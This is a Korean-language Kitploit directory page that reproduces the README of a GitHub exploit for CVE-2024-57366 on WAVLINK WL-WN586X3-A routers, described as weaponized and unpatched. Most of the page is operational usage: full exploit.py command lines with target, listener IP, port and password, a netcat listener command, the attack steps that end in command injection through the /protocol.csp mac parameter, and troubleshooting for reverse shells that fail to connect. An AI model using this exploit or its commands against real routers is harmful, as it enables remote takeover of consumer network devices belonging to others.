Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-57366 — CVE-2024-57366에 대한 WAVLINK WL-WN586X3-A 라우터 제품화 익스플로잇 (이 릴리즈 기준 미패치 상태!) | Kitploit
도구/GitHubGitHub/h4ckusaur/cve-2024-57366
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

CVE-2024-57366에 대한 WAVLINK WL-WN586X3-A 라우터 제품화 익스플로잇 (이 릴리즈 기준 미패치 상태!)

11개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2024-57366 익스플로잇

MAC 주소 검증 우회와 명령어 삽입을 통해 취약한 라우터에서 원격 코드 실행을 가능하게 하는 CVE-2024-57366용 견고한 익스플로잇입니다.

이것은 인증 후(post-authorization) 익스플로잇으로, 라우터의 "Remote Control" 기능이 켜져 있어야 하며 관리자 비밀번호가 필요합니다. 관리자 사용자 이름은 "admin"으로 하드코딩되어 있습니다.

🚀 기능

  • 자동 MAC 주소 등록 - WiFi에 연결하여 라우터에 MAC 주소를 등록
  • 네트워크 보존 익스플로잇 - 익스플로잇 중 기존 네트워크 연결 유지
  • MAC 주소 캐싱 - 캐시된 성공 MAC 주소로 빠른 반복 익스플로잇
  • BurpSuite 호환 - 최대 신뢰성을 위해 정확한 요청 형식 일치
  • 타임아웃 처리 - 리버스 셸 연결이 예상될 때 유용한 메시지 표시
  • 사용자 친화적 - 쉬운 관리를 위한 간단한 텍스트 기반 MAC 주소 캐시

📋 요구 사항

  • Python 3.6+
  • 무선 어댑터가 있는 Linux 시스템
  • sudo 권한 (네트워크 인터페이스 관리에 필요)
  • CVE-2024-57366에 취약한 대상 라우터

🛠️ 설치

  1. 익스플로잇 파일을 클론하거나 다운로드하세요
  2. 필요한 Python 패키지가 있는지 확인하세요:
    root@kitploit:~
    pip3 install requests
    

🎯 사용법

기본 익스플로잇 (첫 번째)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

빠른 익스플로잇 (캐시된 MAC 사용)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"

전체 익스플로잇 강제 실행 (캐시 건너뛰기)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

캐시된 MAC 주소 목록 보기

root@kitploit:~
python3 exploit.py --list-cached

📖 명령줄 옵션

  • --target - 대상 라우터 IP 주소 (기본값: 127.0.0.1)
  • --port - 대상 라우터 포트 (기본값: 80)
  • --local-ip - 리버스 셸 콜백을 위한 로컬 IP 주소
  • --local-port - 리버스 셸 콜백용 로컬 포트 (기본값: 4444)
  • --password - 라우터 관리자 비밀번호
  • --ssid - WiFi 네트워크 이름 (기본값: WAVLINK-Mesh_DC4B)
  • --force-full - 전체 익스플로잇 강제 실행, 캐시된 MAC 확인 건너뛰기
  • --list-cached - 캐시된 MAC 주소를 나열하고 종료

🔧 작동 방식

기술 개요

CVE-2024-57366은 라우터 펌웨어의 MAC 주소 검증 우회를 악용합니다. 이 취약점은 /protocol.csp 엔드포인트의 mac 매개변수를 통한 명령어 삽입을 허용합니다.

익스플로잇 프로세스

  1. 인증 - 라우터에서 인증 토큰 추출
  2. WiFi 비밀번호 재설정 - 관리자 비밀번호와 일치하도록 라우터 WiFi 비밀번호 재설정
  3. MAC 등록 - WiFi에 연결하여 라우터에 MAC 주소 등록
  4. 명령어 삽입 - 등록된 MAC을 사용하여 리버스 셸 페이로드 주입
  5. 네트워크 보존 - 전체 과정에서 기존 네트워크 연결 유지

주요 기술 세부 사항

  • MAC 검증 우회: 라우터는 WiFi에 연결되었는지 확인하여 MAC 주소를 검증
  • 네트워크 인터페이스 바인딩: 원래 네트워크 컨텍스트를 보존하기 위해 eth0 인터페이스 사용
  • 요청 형식: BurpSuite 형식과 정확히 일치 (index=1, URL 경로의 토큰)
  • 페이로드: 안정성을 위한 named pipe가 포함된 Netcat 리버스 셸

MAC 주소 캐싱

익스플로잇은 성공한 MAC 주소를 successful_macs.txt에 자동으로 캐시합니다:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

수동 MAC 추가: successful_macs.txt를 편집하고 다음과 같은 줄을 추가하세요:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 사용 예시

첫 번째 익스플로잇 시도

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"

후속 익스플로잇 (훨씬 빠름)

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC

🔍 문제 해결

일반적인 문제

  1. "무선 어댑터를 찾을 수 없음"

    • 무선 어댑터가 활성화되어 있는지 확인하세요
    • WiFi가 켜져 있는지 확인하세요
    • sudo로 실행해 보세요
  2. "MAC 주소 검증 실패"

    • MAC 주소를 라우터에 등록해야 합니다
    • WiFi 연결 단계가 성공적으로 완료되었는지 확인하세요
    • 먼저 WiFi에 수동으로 연결해 보세요
  3. "요청 시간 초과"

    • 실제로는 익스플로잇이 성공했다는 뜻일 수 있습니다!
    • netcat 리스너에서 리버스 셸 연결을 확인하세요
    • 라우터가 명령을 실행 중이지만 HTTP에 응답하지 않을 수 있습니다
  4. "리버스 셸이 연결되지 않음"

    • --local-ip가 올바른지 확인하세요 (ip addr show eth0 사용)
    • 방화벽이 연결을 차단하지 않는지 확인하세요
    • netcat 리스너가 올바른 포트에서 실행 중인지 확인하세요

네트워크 요구 사항

  • eth0 인터페이스: 네트워크 보존을 위해 IP 주소가 있어야 함
  • 무선 어댑터: 초기 MAC 등록에 필요
  • 라우터 접근: eth0 인터페이스를 통해 라우터에 도달할 수 있어야 함

📁 파일 구조

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ 면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다. 소유한 시스템이나 테스트할 명시적 권한이 있는 시스템에서만 사용하세요. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다.

🔗 참조

  • CVE-2024-57366
  • MAC 주소 검증의 라우터 펌웨어 취약점
  • /protocol.csp 엔드포인트를 통한 명령어 삽입

📝 라이선스

이 프로젝트는 교육 목적으로 있는 그대로 제공됩니다. 책임감 있게 그리고 적용 가능한 법률 및 규정에 따라 사용하세요.

도구 다운로드